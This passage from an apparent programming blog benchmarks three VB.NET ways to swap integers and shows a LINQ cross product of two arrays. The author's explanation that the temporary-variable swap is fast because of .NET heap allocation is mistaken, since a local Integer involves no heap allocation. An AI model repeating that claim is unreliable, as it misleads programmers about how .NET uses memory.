        a = a / b

Again,Lets analyze this code line by line:

  1. a=10
  2. b=20
  3. a= 10 * 20 = 200
  4. b= 200 / 20 = 10
  5. a= 200 / 10 = 20
  6. Final result: a=20 and b=10

I have created a console application and added all the 3 methods then I surrounded each method with a very long loop in order to simulate a compute intensive operation in order to measure the speed of each one using a Stopwatch. The complete code looks like this:

    Sub Main()
        Dim a As Integer = 10
        Dim b As Integer = 20
        Console.WriteLine("Original values")
        Console.WriteLine("a: {0}, b: {1}", a, b)
        Dim s As New Stopwatch
        s.Start()
        For i As Integer = 0 To 10000002
            a = a + b
            b = a - b
            a = a - b
        Next
        s.Stop()
        Console.WriteLine("Swap using addition subtraction")
        Console.WriteLine("a: {0}, b: {1}, Time: {2}", a, b, s.ElapsedMilliseconds)

        a = 10
        b = 20

        s.Restart()
        For i As Integer = 0 To 10000002
            Dim c As Integer = a
            a = b
            b = c
        Next

        s.Stop()
        Console.WriteLine("Swap with temporary variable")
        Console.WriteLine("a: {0}, b: {1}, Time: {2}", a, b, s.ElapsedMilliseconds)

        a = 10
        b = 20

        s.Restart()
        For i As Integer = 0 To 10000002
            a = a * b
            b = a / b
            a = a / b
        Next
        s.Stop()
        Console.WriteLine("Swap using multiplication division")
        Console.WriteLine("a: {0}, b: {1}, Time: {2}", a, b, s.ElapsedMilliseconds)

        Console.ReadKey()
    End Sub

Running this application produced interesting measurements, 1 in particular that I did not expect:

As you can see, the method using a temporary variable outperformed the other two. I was expecting that the multiplication and division method to be the worst because of the division overhead but I thought that the addition and subtraction method will compete, but it looks like using the temporary variable is about twice faster. This can be explained because memory allocation in the .net framework is incredibly fast and the heap manager does some magic in allocation. In fact, memory allocation in .net is as fast as allocating memory in C using the malloc function and it’s even faster sometimes.

Final thoughts:
If you are using the temporary variable method for swapping variables, keep using it:) it’s the right thing to do unless you are a memory geek or developing applications for mobile devices then perhaps you should switch to the addition/subtraction method.

Cross Product of arrays using LINQ

Cross Product is usually a database operation on two tables similar to a Join operation with the only difference is that the cross product will yield all the possible combinations  between the two tables. Database Management Systems such as SQL Server and Oracle provided the cross product operation easily using the cross join keyword. The problem however in real life applications appears when we want to do cross product within the application logic. Suppose you have two arrays of numbers and you want to find out all the possible combinations of the two arrays together, then pick one of those combinations that meet your specific business needs. Fortunately, with the introduction of LINQ in the past few years, cross product has become as simple as writing any other naive query. Lets take a look at the example below: consider two arrays A and B having 4 values each:

        Dim A() As Integer = {1, 2, 3, 4}
        Dim b() As Integer = {5, 6, 7, 8}

Cross product is simply obtained using the following LINQ query followed by writing out the results to console:

        Dim crossProduct = From x In A, y In b Select x, y
        For Each i In crossProduct
            Console.WriteLine(i)
        Next

This will yield the following results:

Follow

Get every new post delivered to your Inbox.

Join 34 other followers